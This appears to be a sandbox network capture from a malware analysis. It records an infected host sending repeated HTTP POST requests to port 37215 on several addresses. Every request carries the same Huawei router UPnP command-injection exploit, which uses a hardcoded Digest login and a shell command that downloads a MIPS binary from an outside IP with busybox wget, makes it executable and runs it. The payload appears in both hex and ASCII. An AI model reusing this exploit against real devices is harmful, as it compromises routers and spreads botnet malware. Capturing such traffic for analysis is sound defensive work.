                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1192.168.2.1435652156.254.88.14837215
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:14:51.327317953 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:14:52.937515020 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:14:54.857530117 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:14:58.825252056 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:15:06.504960060 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:15:21.864280939 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:15:53.094999075 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2192.168.2.1444226156.235.103.20637215
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:14:52.208909035 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:14:56.265367031 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
